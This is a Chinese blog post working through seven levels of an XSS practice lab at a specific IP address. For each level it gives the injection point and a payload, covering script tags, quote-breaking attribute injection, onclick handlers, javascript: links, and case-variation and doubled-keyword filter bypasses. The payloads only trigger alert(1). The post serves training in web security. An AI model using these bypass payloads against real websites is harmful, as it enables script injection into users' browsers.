XSS基础学习(2)
六、靶场实践
第一关
http://8.130.109.21:9995/level1.php?name=test
// 通过页面发现输入点,name=test,test是输入点,先输入<,查看页面源码,此时<未被转义,构建以下payload。通关
//payload
http://8.130.109.21:9995/level1.php?name=<script>alert(1);</script>
第二关
http://8.130.109.21:9995/level2.php?keyword=test
// 查看页面源码<input name=keyword value="test">,需要闭合,构建payload
//payload,在输入框中输入
"><script>alert(1);</script>
第三关
http://8.130.109.21:9995/level3.php?keyword=%3E&submit=%E6%90%9C%E7%B4%A2
// 在输入点输入>,然后查看页面源码,发现<input name=keyword value='>'>,此时>被转义,此时可以用onclick来构建payload
//payload 输入框内输入,提交后点击输入框
' onclick='javascript:alert(1)
第四关
http://8.130.109.21:9995/level4.php?keyword=try%20harder!
// 查看页面源码,发现闭合方式是双引号闭合
<input name=keyword value="try harder!">
//payload构建
" onclick="javascript:alert(1)
第五关
http://8.130.109.21:9995/level5.php?keyword=find%20a%20way%20out!
// 输入onclicke等关键字,会发现
<input name=keyword value="" o_nclick="javascript:alert(1)">
//payload
"> <a href="javascript:alert(`xss`);">xss</a
第六关
http://8.130.109.21:9995/level6.php?keyword=break%20it%20out!
// 输入点输入 " onclick="javascript:alert(1) 发现
<input name=keyword value="" o_nclick="javascript:alert(1)">试试大小写绕过的方式
//payload
" ONclick="javascript:alert(1)
第七关
http://8.130.109.21:9995/level7.php?keyword=move%20up!
// 输入点输入 " onclick="javascript:alert(1) 发现
<input name=keyword value="" click="java:alert(1)">,发现消去关键字,试试双写绕过
" oONnclick="javascript:alert(1)
标签:XSS,http,基础,alert,学习,109.21,9995,payload,输入
From: https://www.cnblogs.com/xiaoyi208/p/17629634.html